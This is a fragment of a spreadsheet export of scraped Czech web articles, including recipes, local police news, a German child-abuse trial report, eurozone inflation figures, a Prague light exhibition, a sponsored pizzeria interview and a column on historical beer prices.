benefity, od podpory metabolismu po zlepšení koncentrace a detoxikaci organismu. Výběr konkrétního druhu čaje závisí nejen na chuti, ale také na situaci a osobních preferencích. Bez ohledu na to, zda si zvolíte jemný bílý čaj, povzbuzující černý čaj, nebo zemitý pu-erh, je čaj fascinujícím nápojem s bohatou tradicí, který přináší potěšení po celém světě. Zdroj: Artfultea.com ( odkaz ), nutritionsource.hsph.harvard.edu ( odkaz ) O autorovi – Lukáš Erlebach Autorem obsahu je známý kuchař a propagátor zdravého stravování ve svém pořadu “ Zdraví na talíři “. Připravuje tradiční pokrmy levně, jednoduše a z dostupných surovin. Přihlásit přes Seznam info@zadnyspeky.cz AUTOR: TVORBAWEBU.TOP DALŠÍ ČASOPISY IT pro Tebe ITALIAN-CUISINE Gamebot.cz Autor: Lukáš Erlebach Autor person Lukáš Erlebach Rubrika transition_slide NÁVODY</t>
  </si>
  <si>
    <t>17180</t>
  </si>
  <si>
    <t>21400</t>
  </si>
  <si>
    <t>20241101_379_3242500841_1533442c05d59f6477a9.html</t>
  </si>
  <si>
    <t>1533442c05d59f6477a9</t>
  </si>
  <si>
    <t>Inspirace na nedělní oběd: Hovězí kližka s kořenovou zeleninou</t>
  </si>
  <si>
    <t>Inspirace na nedělní oběd: Hovězí kližka s kořenovou zeleninou Hovězí kližka je vynikající maso, které se hodí na pomalé vaření. Díky obsahu kolagenu a tuku se pomalým vařením uvolní ta nejlepší chuť a výsledkem bude jemné a měkoučké maso plné chuti. Foto: Alena Kolaříková Do kterých jídel se hovězí kližka nejlépe hodí? Guláš : Kližka je ideální na přípravu guláše. Dlouhé vaření způsobí, že maso změkne a uvolní chuť do omáčky. Dušená kližka : Dušení je skvělý způsob, jak z kližky vytáhnout maximum chuti. Maso můžete dusit s kořenovou zeleninou, bylinkami, česnekem a červeným vínem či vývarem. Hovězí vývar : Kližka se dá použít také na přípravu silného hovězího vývaru. Díky obsahu kolagenu je vývar sytější a chutnější. Pečená kližka : I když to není tak běžné, můžete kližku pomalu upéct při nízké teplotě. Maso se pak rozpadá na vlákna a je velmi chutné. Pomalu vařená kližka na cibuli a česneku : Kližku můžete pomalu vařit v troubě či na sporáku s cibulí, česnekem, bylinkami a trochou tekutiny (například víno či vývar) pro dosažení jemného masa. Ale co je důležité pamatovat si, když se pustíte do zpracování hovězí kližky? Jak postupovat, aby byl výsledek co nejlepší? Kližka vyžaduje dlouhé a pomalé vaření, ideálně několik hodin, aby maso bylo měkké a šťavnaté. Můžete ji předem marinovat v bylinkách, česneku a oleji, což zvýrazní chuť. Použijte výrazné koření jako je paprika, pepř, bobkový list, tymián či rozmarýn. Přidáním vína , piva nebo vývaru získáte ještě bohatější chuť. MOHLO BY SE VÁM LÍBIT: Grilovaný hovězí flank steak se svěžím salátem Suroviny 1 kg hovězí kližky 2 cibule 3 mrkve 2 petržele 1/4 celeru 1 menší cuketa 4 stroužky česneku 3 lžíce směsi Guláš Avokádo 2 lžíce rajčatového protlaku 2 bobkové listy Avokádo 500 ml hovězího vývaru 250 ml červeného vína olej sůl podle chuti Postup Hovězí kližku nakrájejte na větší kostky. Velice jemně osolte. V hrnci rozehřejte olej a kostky masa ze všech stran dozlatova opečte. Poté maso vyjměte a dejte stranou. Cibuli, mrkev, petržel a celer nakrájejte na menší kousky. Česnek nasekejte nadrobno. Do hrnce po masu přidejte cibuli a česnek, a smažte, dokud nezesklovatí. Poté přidejte mrkev, petržel a celer a smažte dalších několik minut. Přidejte rajčatový protlak, koření na guláš a bobkové listy. Vše dobře promíchejte. Vraťte maso do hrnce, přidejte červené víno a zvyšte teplotu tak, aby se většina tekutiny vyvařila. Poté přidejte vývar. Přiveďte k varu, poté snižte teplotu, přikryjte pokličkou a nechte pomalu dusit na mírném ohni 2,5 až 3 hodiny, dokud maso není měkké. Na závěr můžete ještě přisolit, ale většinou to není potřeba. Podávejte s knedlíkem. Moc dobře chutná, když ho lehce opečete na trošce oleje. Dobrou chuť přeje Elly. MOHLO BY SE VÁM LÍBIT: Hovězí kližka na pivu Reklama Autor: Autor: | elly Rubrika transition_slide Vaření</t>
  </si>
  <si>
    <t>70080</t>
  </si>
  <si>
    <t>24280</t>
  </si>
  <si>
    <t>20241101_38_3264303724_46130844ace6ce954054.html</t>
  </si>
  <si>
    <t>46130844ace6ce954054</t>
  </si>
  <si>
    <t>Muž alkoholem překonal všechny limity: Opilci v Řečkovicích nestačil ani alkoholtester</t>
  </si>
  <si>
    <t>Muž alkoholem překonal všechny limity: Opilci v Řečkovicích nestačil ani alkoholtester Brněnští strážníci zažili nedávno neobvyklý zásah, když vyjeli na oznámení k opilému muži v tramvajové smyčce v Řečkovicích. Podle řidičky dopravního podniku, která událost nahlásila, ležel čtyřiapadesátiletý muž silně pod vlivem alkoholu blízko kolejí. Řidička ho společně s jedním z cestujících odtáhla do bezpečné vzdálenosti, aby nedošlo k neštěstí, měla však obavy, že by se mohl vrátit a ohrozit svůj život. Když strážníci dorazili na místo a muže požádali, aby podstoupil dechovou zkoušku, čekal je překvapivý výsledek – přístroj ukázal, že naměřená hodnota přesahuje jeho maximální kapacitu, která se pohybuje kolem šesti promile. Po chvíli strážníci zkoušku zopakovali a tentokrát přístroj ukázal extrémní hodnotu 5,38 promile, což je množství alkoholu , které může být pro běžného člověka smrtelné. Na místo byla přivolána záchranná služba, která si muže převzala a po prvotním ošetření ho převezla do nemocnice. Incident tím ale pro opilého muže nekončí – protože se v tomto stavu nacházel na nástupišti hromadné dopravy, je podezřelý z porušení tabákového zákona. Ve správním řízení mu hrozí pokuta až dvacet tisíc korun. Celý zásah ukazuje, jak nebezpečné může být extrémní množství alkoholu nejen pro samotného konzumenta, ale i pro okolí. Rychlá reakce svědků a následný zásah strážníků zřejmě zabránily vážnějším následkům. Zdroj: MPB Ilustrační foto: BRNO today Autor: admin Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>436</t>
  </si>
  <si>
    <t>20241101_380_3242472192_c62d628b7ec07cca48f6.html</t>
  </si>
  <si>
    <t>c62d628b7ec07cca48f6</t>
  </si>
  <si>
    <t>Třetí ročník projektu „Světla vyprávějí…“ přináší fascinující vesmírný zážitek do Žlutých lázní Více než stovka světelných soch a objektů tvořená čtyřmi sty tisíci světly ponese v letošní podzimní a zimní sezóně název „Zvonkova cesta vesmírem.“ Světelný park „Světla vyprávějí…“ se již potřetí vrací do Žlutých lázní v Praze . Přináší ohromující podívanou inspirovanou příběhem pohádkové postavy Zvonka. Tento kouzelný průvodce Zvonek vezme malé i velké návštěvníky na nezapomenutelnou cestu tajemstvími vesmíru. Unikátní výstava bude otevřena od 1. listopadu 2024 do 31. ledna 2025 každý den po setmění. „ Zvonkova cesta vesmírem“ zahrnuje planety, hvězdy, Slunce, kosmické lodě i astronauty a nabízí jak úchvatnou světelnou podívanou, tak i vzdělávací interaktivní prvky. Návštěvníci se prostřednictvím moderních technologií a animací seznámí s nejnovějšími vědeckými poznatky o vesmíru, které jsou zpracovány zábavnou a hravou formou, což zejména děti vtáhne do dobrodružství plného objevů. S pojení Vánoc s vesmírem Výstava propojuje vánoční atmosféru s kosmickými motivy. Betlémskou hvězdu zde symbolizuje kometa, která provází návštěvníky na cestě nekonečným prostorem, a na návštěvníky čeká také unikátní vesmírný strom splněných přání. Tento prvek propojuje tradiční vánoční symboliku s inovativními světelnými instalacemi. Ruční tvorba světelných soch: Umění, design a jedinečnost v každém detailu Světelné expozice „Světla vyprávějí…“ jsou zcela unikátní zejména tím, že jejich téma a zpracování respektují a doplňují místo, ve kterém jsou instalovány. Všechny světelné sochy a objekty jsou ručně vyráběny v české rodinné firmě Decoled pod vedením majitelky Evy Poláčkové. Tým zkušených designérů a řemeslníků společně pracuje na tom, aby každé dílo mělo svou jedinečnou tvář. Kreativní nápady jsou pečlivě zpracovávány po celý rok, aby se v zimních měsících mohly proměnit v ohromující světelné instalace. Každý vystavený kus je originální a nese rukopis talentovaných řemeslníků, kteří vdechují těmto dílům život. Ekologický přístup a interaktivní zážitky Celá výstava je navržena s důrazem na udržitelnost. LED diody a další světelné prvky jsou energeticky úsporné, a mnohé dekorace jsou vyrobeny z recyklovatelných plastů pomocí nejmodernějšího velkoplošného 3D tisku. Interaktivní prvky umožní návštěvníkům hravou formou objevovat vesmírná tajemství a díky environmentálnímu přístupu má expozice minimální dopad na životní prostředí. Odborná spolupráce „ Zvonkova cesta vesmírem“ vznikla ve spolupráci s astronomy z Hvězdárny Žebrák a dalšími odbornými institucemi, což zajišťuje autenticitu a vzdělávací hodnotu expozice. Návštěvníci se mohou těšit nejen na vizuální zážitek, ale i na poutavé informace o vesmíru. Výjimečné místo pro sváteční setkávání Světelné parky „Světla vyprávějí…“ nejsou jen vizuální podívanou, ale především místem, kde se lidé setkávají a společně sdílejí kouzelnou atmosféru svátků. „Naším přáním je nejen rozzářit veřejný prostor, ale také vnést světlo a inspiraci do života lidí. Chceme, aby každá expozice vkusně a citlivě kultivovala okolí a zároveň respektovala tradice a ducha místa, kam je zasazena. Letos budou naše světelné parky na patnácti místech po celé Evropě a těší nás, že mohou přinést radost všem,“ říká Eva Poláčková, majitelka společnosti Decoled . Zveme vás k jedinečnému zážitku Světelná expozice ve Žlutých lázních je příležitostí strávit volný čas netradičně a objevovat ztvárněné krásy vesmíru v klidném prostředí přímo u Vltavy . Výstava je otevřena denně od 1. listopadu 2024 do 31. ledna 2025. „Výstava nabízí možnost krásné zimní procházky na břehu Vltavy v areálu, který je jinak v tomto období zavřený. Zveme všechny, aby si přišli užít spojení s přírodou u zimní řeky, spolu s prohlídkou originálních instalací a vychutnali si třeba rodinný podvečer s vesmírnou atmosférou se sklenicí svařeného vína nebo horké čokolády,“ zve Jan Dell , ředitel areálu Žluté lázně v pražském Podolí . Přijďte se ponořit do fascinujícího světa světla a objevte, jak neuvěřitelně krásný je nekonečný vesmír kolem nás! Foto: Decoled a 2x Petr Brodecký Místo konání: Otevírací doba: Areál Žluté lázně Denně (po-ne) 16-21 hodin Podolské nábřeží 3/1184 140 00 Praha Více informací na: https://svetlavypraveji.cz/praha Světelnou expozici Světla vyprávějí… připravila česká rodinná společnost DECOLED . Již více než čtvrt století zdobí světly města a obce v Česku i zahraničí. Tvoří tematické světelné dekorace obchodních center, vánočních trhů a světelných parků. Vyrábí a prodává vánoční světla a dekorace. Prostě žije Vánoci po celý rok, a to už 27 let. Navigace pro příspěvek Počasí Nejnovější příspěvky Nadace Naše dítě rychle pomáhá rodinám s dětmi z oblastí zasažených povodněmi Chuť Vánoc, které nelze odolat Jubilejní desátý ročník ocenění Nejdůvěryhodnější značka potvrzuje loajalitu českých zákazníků Vánoce, to jsou zážitky z jižních Čech . Darujte procházku s alpakou, jízdu traktorem nebo lední jachting na Lipně . Deset Lišek na severovýchodě Čech . České dráhy pokračují v modernizaci vlaků v Královéhradeckém kraji Archivy Autor: Petr Brodecký Autor person Petr Brodecký Rubrika transition_slide Z domova</t>
  </si>
  <si>
    <t>165</t>
  </si>
  <si>
    <t>142</t>
  </si>
  <si>
    <t>20241101_381_3264684709_d73d59f4ec304ae8b0ff.html</t>
  </si>
  <si>
    <t>d73d59f4ec304ae8b0ff</t>
  </si>
  <si>
    <t>Shrnutí Otec v Německu oplodnil 12letou dceru, zjistilo se to v pátém měsíci. Nic si nepamatuji, tvrdí Teprve dvanáctiletou dívku měl v Německu zneužít a přivést do jiného stavu její vlastní otec. Na těhotenství v pátém měsíci se přišlo náhodou, když si stěžovala na bolesti břicha, píše deník Bild. K případu mělo dojít loni v létě v zařízení pro uprchlíky ve městě Friedberg . Muž, který nyní stanul před soudem, se brání nadměrnou konzumací alkoholu a výpadkem paměti, uvádějí tamní média. Že je dívka v pátém měsíci těhotenství, se zjistilo až na dětské klinice v Hesensku , kde byla přijata s bolestmi břicha. Podle testů DNA lékaři zjistili, že nenarozené dítě má patřit biologickému otci dvanáctileté oběti, píše německý deník Bild . Rodina se rozhodla pro potrat. Zdravotníci okamžitě kontaktovali německou policii a obviněný je od února ve vazbě. Čtyřicetiletý muž eritrejského původu měl svou dceru sexuálně zneužít loni 23. července, uvedla státní zástupkyně Daniela Zehrtová. V době zločinu žili oba v zařízení pro uprchlíky ve městě Friedberg , matka s dalšími členy rodiny dorazila později. Obžalovaný se nyní zodpovídá před hesenským soudem. Nic si nepamatuji, moc jsem toho vypil Muž se hájil, že zkonzumoval příliš alkoholu . Se svým známým podle výpovědi navštívil místní bar, vypil minimálně deset piv a zbytek večera si vůbec nepamatuje, uvádí regionální zpravodajský web Hessenschau . Otec se zároveň bránil, že se dívka o ničem z inkriminovaného večera nezmínila. Soud však namítl, že o požití alkoholu se obžalovaný nikdy předtím nezmínil. Místní deník zároveň podotýká, že zprvu odmítal dobrovolné podstoupení testů DNA. Proces s mužem bude pokračovat 8. listopadu. Dcera proti svému otci vypovídat nebude. V současnosti již nyní třináctiletá dívka se nachází v zařízení pro mládež, kde se vypořádává s traumatickým zážitkem. Podle dětské psycholožky, která ji má v péči, trpí disociativní poruchou a mívá výpadky vědomí. „Ptala jsem se jí, zda ví, jak se rodí děti. Řekla ‚ne‘,“ cituje Bild expertku zkoumající její duševní stav. redaktor FTV Prima , CNN Prima NEWS Autor: Vojtěch Zikán Autor person Vojtěch Zikán Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>20241101_382_3242717045_3cdc3c1985a4cb5b2ebe.html</t>
  </si>
  <si>
    <t>3cdc3c1985a4cb5b2ebe</t>
  </si>
  <si>
    <t>Inflace v eurozóně mírně vzrostla, ceny energií klesly</t>
  </si>
  <si>
    <t>Inflace v eurozóně mírně vzrostla, ceny energií klesly Ekonomika 1. listopadu 2024 8:55 30 sekund čtení Spotřebitelské ceny v eurozóně v říjnu vzrostly meziročně o dvě procenta, oproti září tak inflace zrychlila z předchozích 1,7 procenta. Ilustrační foto. Zdroj: Needpix Ilustrační foto. Zdroj: Needpix V eurozóně v říjnu vzrostla meziroční inflace na dvě procenta ze zářijových 1,7 procenta. Podle předběžných údajů Eurostatu se nejvíce zdražovaly služby, které stouply o 3,9 procenta, zatímco ceny potravin, alkoholu a tabáku se zvýšily o 2,9 procenta. Naopak ceny energií poklesly o 4,6 procenta. Nejvyšší inflaci zaznamenala Belgie , kde ceny vzrostly o 4,7 procenta, zatímco Slovinsko zaznamenalo stabilní ceny. Autor: Šimon Mitro Autor person Šimon Mitro</t>
  </si>
  <si>
    <t>4700</t>
  </si>
  <si>
    <t>2950</t>
  </si>
  <si>
    <t>20241101_383_3242435848_7b64954dbcc84a011855.html</t>
  </si>
  <si>
    <t>7b64954dbcc84a011855</t>
  </si>
  <si>
    <t>Policie na tahu. Prohledávala bary i hospody v Šumperku</t>
  </si>
  <si>
    <t>Policie na tahu. Prohledávala bary i hospody v Šumperku 1. listopadu 2024 ŠUMPERK – Policisté společně s celníky, hygieniky i zástupci obchodní inspekce vyrazili v pátek 25. října do hospod a barů v Šumperku . Ne proto, aby se bavili, ale hledat opilou mládež. Našli tři podnapilé mladistvé. V barech hledali policisté opilou mládež. Do škol vyrazili preventivně působit. Foto: pčr „Nejvyšší naměřená hodnota činila 1,13 promile alkoholu v dechu. Tyto přestupky budou oznámeny správnímu orgánu k dalšímu projednání. Nedostatky zjištěné Českou obchodní inspekcí byly vyřešeny v rámci její kompetence,“ uvedl Ladislav Jílek, mluvčí policie. Pokuta až 150 tisíc korun, nebo dvakrát víc Hospodským a barmanům, kteří nalejí mladistvým, hrozí pokuta až 150 tisíc korun. Pokud podají alkohol lidem pod patnáct let věku, může být sankce ještě dvakrát vyšší. Kromě kontrol se policisté zaměřili také na prevenci. „Pro žáky a studenty na školách si policisté připravili preventivní přednášky o škodlivých účincích návykových látek, zejména pak alkoholu a drog,“ dodal Jílek. Autor: Jaroslav Kropáč INZERCE Volná místa Autor: Jaroslav Kropáč Autor person Jaroslav Kropáč</t>
  </si>
  <si>
    <t>2090</t>
  </si>
  <si>
    <t>2100</t>
  </si>
  <si>
    <t>20241101_384_3242717047_fc1fd6c15bda6d0d8a6a.html</t>
  </si>
  <si>
    <t>fc1fd6c15bda6d0d8a6a</t>
  </si>
  <si>
    <t>Proces stárnutí není plynulý, lidé nejvíce stárnou po čtyřicítce a kolem šedesátin</t>
  </si>
  <si>
    <t>Proces stárnutí není plynulý, lidé nejvíce stárnou po čtyřicítce a kolem šedesátin Zdraví Zajímavosti 1. listopadu 2024 8:47 1 minuta čtení Stárnutí není nejspíš dlouhodobý a plynulý proces tak, jak jsme se doposud domnívali. Podle vědců lidé nejvíce zestárnou ve dvou věkových fázích, a to kolem čtyřicítky a šedesátin. Lze tedy zestárnout za jednu noc, jak si mnozí myslí? Ilustrační fotografie. Zdroj: PxFuel Ilustrační fotografie. Zdroj: PxFuel Vzorky krve, kůže, stolice, ústní a nosní výtěry dokládalo 108 dobrovolníků ve věku 27 až 75 let po dobu až sedmi let. Z nich pak došli vědci pomocí jejich zkoumání k nečekanému, avšak velmi zajímavému zjištění. Sledované vzorky se v průběhu času měnily jen velmi pomalu, ale přibližně po 44. narozeninách a pak po šedesátce na zkoumaných molekulách došlo k výrazným změnám. Rychlejší proces stárnutí se u žen ve věku 40 let často vysvětluje obdobím menopauzy. Není to tak zcela pravda. Menopauza zde určitě hraje výraznou roli, nikoliv tu nejpodstatnější. Náhlé zestárnutí se v tomto věku totiž týká i mužů. V této době dochází k častějším změnám kardiovaskulárního systému a tělu klesá schopnost zpracovat nejen lipidy, ale také kofein a alkohol . To způsobuje náhlý pocit ztráty životní vitality. Po šedesátce pak vědci zaznamenali zejména pokles funkcí imunitního systému, metabolismu sacharidů, ale také snížení funkce ledvin. Vědci upozorňují, že velkou roli v procesu stárnutí hraje stále i zdravá životospráva. Autor: Zuzana Beranová Autor: Zuzana Beranová Autor person Zuzana Beranová</t>
  </si>
  <si>
    <t>20241101_385_3596914952_74d88b8d89ab3b818515.html</t>
  </si>
  <si>
    <t>74d88b8d89ab3b818515</t>
  </si>
  <si>
    <t>Tiskové zprávy</t>
  </si>
  <si>
    <t>Tiskové zprávy Hlídky městské policie pátraly v Novém Lískovci po ztracené dívence. Strážníci nevěřícně sledovali displej, opilému muži v Řečkovicích nestačilo rozpětí testeru na alkohol . 1.11.2024 12:18:06 | přečteno 168x | marketa.skrivankova | Celý článek Řidičce se vybila autobaterie a nemohla nastartovat, z nesnází jí pomohli strážníci 31.10.2024 13:10:54 | přečteno 226x | marketa.skrivankova | Celý článek Muž údajně napadl jiného, protože mu prý nechtěl dát pětistovku, strážníci ho dopadli. Strážníci pomáhali rybáři, který spadl pozdě večer do řeky, byl silně podchlazený. 30.10.2024 9:47:03 | přečteno 284x | marketa.skrivankova | Celý článek Muž zaplnil popelnice stavební sutí, dostal se prý do konfliktu s nájemníky. Strážníci našli peněženku s jedenácti tisíci korunami, ještě ten den ji vrátili jejímu majiteli. 29.10.2024 10:32:32 | přečteno 203x | marketa.skrivankova | Celý článek Senior spadl z postele a zůstal pod ní zaklíněný, zachránili ho strážníci 25.10.2024 8:34:39 | přečteno 342x | marketa.skrivankova | Celý článek Osmdesátník si prý pozval do auta prostitutku, údajně mu utekla s plnou peněženkou 23.10.2024 16:13:46 | přečteno 244x | jakub.ghanem | Celý článek Dvojice si zkracovala cestu domů tramvajovým tunelem, do bezpečí je vyvedli strážníci. 22.10.2024 9:33:20 | přečteno 311x | marketa.skrivankova | Celý článek Opilý muž prý při návštěvě přítelkyně rozbil dveře, strážníci předali jeho totožnost úředníkům. 21.10.2024 14:15:20 | přečteno 198x | marketa.skrivankova | Celý článek Strážníci zastavili opilou řidičku, před jízdou vypila přibližně půl litru vína 20.10.2024 10:00:43 | přečteno 238x | marketa.skrivankova | Celý článek Mladý řidič v Brně navršil za volantem nečekané množství prohřešků. Muž prý dostal výpověď, protože není Moravák, údajně z frustrace poničil ovoce za tisíce. 18.10.2024 13:15:01 | přečteno 248x | jakub.ghanem | Celý článek Autor: as4u.cz, s.r.o.</t>
  </si>
  <si>
    <t>20241101_386_3242451199_e5986d866ac10b642df4.html</t>
  </si>
  <si>
    <t>e5986d866ac10b642df4</t>
  </si>
  <si>
    <t>Těsto z&amp;nbsp;kvásku a&amp;nbsp;kreativní koncept. Ananas na pizze mě neuráží, říká majitelka Slice Slice Baby</t>
  </si>
  <si>
    <t>Těsto z&amp;nbsp;kvásku a&amp;nbsp;kreativní koncept. Ananas na pizze mě neuráží, říká majitelka Slice Slice Baby Ožehavá otázka, která rozděluje společnost. Patří ananas na pizzu? „Nedovedu si představit věc, která by mě na pizze urazila. Pro mě je to chlebová placka, formát, se kterým si můžete hrát,“ říká Kateřina Jakusová. Ta si před časem v Holešovicích otevřela originální pizzerii Slice Slice Baby, kde tuhle filozofii razí v praxi. Pizzu s ananasem v nabídce najdete. Aby se ale pizzoví puristé neurazili, nejmenuje se Havaj . Místo toho stačí říct „vy víte kdo“ – Youknowho. „Nejde o klasickou Havaj . Místo rajčatového základu používáme jako základ rozmixovaný ananas. A jako toping máme uzené maso od holešovických sousedů z Big Smokers a čerstvý ananas, žádnou konzervu. Všechno u nás se snažíme dělat z nejlepších surovin,“ líčí Jakusová. Na zkušenou do Berlína Formující zkušeností pro Kateřinu bylo, kdy v devatenácti po studiu obchodky spontánně přesídlila do Berlína . „Kamarád se tam tehdy stěhoval a já se k němu tak trochu přifařila. Jsem typ člověka, co když se objeví nějaká příležitost, tak řekne ‚proč ne‘, a jdu do toho bez nějakého většího plánování,“ říká. V německé metropoli strávila pět let. Pobyt ji hodně naučil a taky v sobě objevila lásku ke gastronomii. „Ta mě přitom do té doby nějak výrazně nezajímala. Ale najednou jsem zjistila, že mě strašně baví vařit. Na bytě jsme si zamilovali nákupy surovin na tureckých trzích a vymýšlet neustále něco nového,“ vzpomíná na berlínská léta. Odtud byl už jen krůček se novým koníčkem začít živit – jít dělat něco, co ji baví, a ještě za to dostat peníze, popisuje tehdejší úvahu. Přihlásit se jen tak do provozu bez jakékoli profesionální zkušenosti si přece jen netroufla. „Tak jsem si do životopisu dala nějaké zkušenosti z Prahy z bistra a kavárny a doufala, že to nikdo nebude ověřovat, že nebudou volat z Berlína na Letnou ,“ směje se. A tak nastoupila do snídaňového bistra Silo, kde se podávala vajíčka i pověstné avokádové toasty. „Bylo to celkem intenzivní a byl to fajn základ pro další pokračování v gastru,“ říká Jakusová. Po pěti letech v Berlíně , kde si odbyla i první pokusy o něco vlastního v podobě prvních pop-upů a akcí na venkovních místech, se vrátila do Prahy . „A cíleně jsem se vracela s tím, že nastoupím do Esky , kterou jsem vnímala jako nejatraktivnější, nejzajímavější místo,“ vysvětluje. Zrození Slice Slice Baby Po pětiletém angažmá v Esce , krátce přerušeném stáží v dánské restauraci Noma , se vrhla zase jiným směrem – pečení. „Můj příběh je trochu divoký, protože se beze změn v životě neobejdu,“ uvažuje s úsměvem. Pokračovala tedy ve vyhlášené pražské pekárně Kus koláče, potažmo Další kus, a zase si vyzkoušela něco nového. „Nezdá se to, ale vaření a pečení jsou dost rozdílné činnosti. Zároveň mě tehdy napadlo přijít s něčím, co by oba světy spojilo, a ještě by z toho byl pro mě a kolegy fajn oběd,“ prozrazuje. Tušíte správně, že to něco byla pizza. A tak se velmi rychle zrodilo Slice Slice Baby. „Původně to byl pop-up koncept. Za dva roky jsem vystřídala spoustu míst, občas jsme někde hostovali, třeba tady v Holešovicích v Big Smokers,“ popisuje. K otevření kamenného podniku už zbýval jen krůček. Ale k němu Jakusová potřebovala pošťouchnout. S nápadem přišel její obchodní partner Ondřej Hollas , kterého zná z Ambiente. „A řekla jsem proč ne. Dnes z toho mám dobrý pocit, baví mě to a vyděláme si na sebe. Navíc jsme do všeho investovali z vlastních peněz, takže nikomu nic nedlužíme,“ chválí si. 150 kváskových pizz denně Kromě pizzy „vy víte kdo“ na poměrně jednoduchém menu najdete Margheritu a Diavolu, obě vytuněné sýrem Grana Padano, Verde se zeleným pestem a mozzarellou a Bianca s mozzarellou, karamelizovanou cibulí, žloutkem a pecorinem. Jedno místo zůstává pro týdenní speciál, třeba pizzu bro s brokolicí nebo kim s kimchi. Pizza ve Slice Slice Baby je kvásková, zatímco jinde se většinou pizza zadělává na droždí. „Kvásek je takové tamagoči nebo zvířátko, protože je trošku těžší ukočírovat. Nicméně fermentace, která proběhne v těstě, je komplexnější a pizza je díky tomu stravitelnější pro to tělo, protože kvásek ji tak trochu předtráví, proto i třeba kváskový chleba třeba je pro zažívání,“ vysvětluje Kateřina své důvody. Na prominentním místě podniku se vyjímá pec, takže hosté můžou sledovat přípravu. Atmosféra podniku je spíš neformální, žádná snobárna. Přesto si člověk k pizze může objednat dobré víno a jako dezert si dát poctivé tiramisu. Do podniku se vejde asi třicítka hostů. To ale pizzerii nijak nelimituje. „Populární je pizza s sebou, ať už osobně, nebo přes kurýra a objednávku v aplikaci Wolt, se kterým máme exkluzivní dohodu, díky které máme lepší podmínky,“ vysvětluje Jakusová. Za den tak i s objednávkami s sebou z pece vyndají 150 rozpálených pizz, což Slice Slice Baby řadí k větším pizzeriím. Jako samozřejmost, která jim usnadňuje práci, Kateřina Jakusová označuje bezhotovostní platby. „Platba přes terminál představuje drtivou většinu denní tržby. Akceptace karet je standard, který naši hosté očekávají, je to pohodlnější jak pro ně, tak i pro nás. My se můžeme věnovat obsluze a těstu a zákazníci si naplno vychutnají zážitek u nás,“ hlásí Kateřina Jakusová. Visa je jednou z největších platebních sítí světa, která propojuje podnikatele s více než 4,2 miliardy potenciálních zákazníků – držitelů platebních karet Visa. V Česku podnikatelům pomáhá program Česko platí kartou , který nabízí platební terminál na šest měsíců zdarma a doteď jej využilo už více než 35 tisíc obchodníků. Na podporu žen podnikatelek Visa spustila globální program She’s Next , který jim pomáhá v růstu podnikání pomocí grantu a mentoringových programů . Autor: AdVoice společnosti | Visa || Visa</t>
  </si>
  <si>
    <t>84550</t>
  </si>
  <si>
    <t>20241101_387_3242571103_1e725f828aa8a43b5692.html</t>
  </si>
  <si>
    <t>1e725f828aa8a43b5692</t>
  </si>
  <si>
    <t>Pivní republika je silnější než ta první. Typická česká domácnost si dnes může dovolit 12x více piva než před sto lety</t>
  </si>
  <si>
    <t>Pivní republika je silnější než ta první. Typická česká domácnost si dnes může dovolit 12x více piva než před sto lety Petr Bartoň datový ekonom Datarun C ena piva je dnes úplně stejná, jako byla na začátku roku. Podle posledních údajů toho nejlepšího a nejvyváženějšího měřítka, které máme – podle Českého statistického úřadu. Vzhledem k tomu, že nám mezitím od začátku roku stouply mzdy a platy zhruba o pět procent, je tak dnes pivo reálně o pět procent levnější než v lednu. Namísto půllitru si dnes můžeme dovolit o čtvrt deci více. Mezitím, na jaře, však ceny byly vyšší než dnes, takže teď v posledních měsících spíše klesaly. Pivo tedy nyní pomáhalo snižovat celkovou inflaci. Nebýt jej, byla by vyšší. Ve dnech výročí vzniku republiky se ale podívejme, kolik stálo pivo tehdy, za první republiky. Například v roce 1928 stálo jenom jednu korunu padesát! To znamená, že na koruny bylo zhruba 8x levnější než dnes. Takové srovnání by se dalo udělat, kdyby tehdy lidé brali tolik jako dnes, tedy v průměru zhruba 46 tisíc měsíčně. To ale nebrali ani zdaleka. Průměrné příjmy známe oficiálně až od roku 1930, kdy převýšily 700 Kč měsíčně, takže něco je třeba dopočítat. Za první republiky si mohl pracující dovolit zhruba 500 piv měsíčně. Dnes je to více než 3 500 piv . Za každé jedno prvorepublikové pivo si jich dnes může pracující dovolit více než sedm. A to přitom nezapočítáváme, že zatímco dnes typická (mediánová) rodina žije ze dvou příjmů, za první republiky to bylo z jednoho. Tedy přepočítáno na typický příjem rodiny (a nikoli typického pracujícího) si dnes piva můžeme dovolit zhruba 12x více. Čím to je? Zčásti to je tím, že je naše práce mnohem produktivnější, a tak si reálně více vyděláme. To samozřejmě neznamená, že když je dnes pivo 12x levnější, že jej vypijeme 12x více. Oproti roku 1928 dnes jeden obyvatel ČR vypije zhruba jen o polovinu piva více. Ale tehdejší průměr velmi snižovali obyvatelé Moravy . Tři největší pivovary Československa byly na území Čech . A stejně jako dnes jim všem kraloval Měšťanský pivovar v Plzni . Když porovnáme spotřebu piva čistě jen za obyvatele Čech , ti dnes vypijí „jen“ o třetinu více. Druhým důvodem toho, proč si dnes můžeme dovolit 12x více v pivní republice než v první republice, je neustále se zlepšující umění a profesionalita sládků. Že máme dnes levnější elektroniku nikoho nepřekvapí. Lidé za těch 100 let vymysleli chytřejší technologie. Že máme dnes levnější nábytek, by nás také nemělo překvapit. Dřevo je stále stejné, jen dnes vše vyrábí roboty. A navíc si dnes nábytek musíme sešroubovat sami a výrobce ušetří za skladové prostory. Ale pivo mělo nesrovnatelně složitější 100letou cestu k reálnému zlevnění. Nejen že nenechává na nás, abychom si je sami složili či „namíchali“, ale tekutina není stlačitelná, tak nic neušetří ani za skladovací prostory. A to se přitom – oproti nábytku nebo třeba i limonádám – neustále proměňují vstupní ingredience. Ječmen, chmel a všechno ostatní se liší nejen podle místa sklizně, ale i podle roku sklizně. Vinař té proměnlivosti smí říkat „ročník“. Uvařit z měnících se vstupů ve velkém pivovaru každý rok stále stejně kvalitní pivo – a ještě k tomu stále levněji –, za to si dnes sládkové zaslouží přípitek, stejný jako první republika. Autor je datový ekonom, Datarun #inflace #ceny potravin #pivo #pivovarnictví #newsletter Týden v komentářích Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: Petr Bartoň Autor person Petr Bartoň Rubrika transition_slide 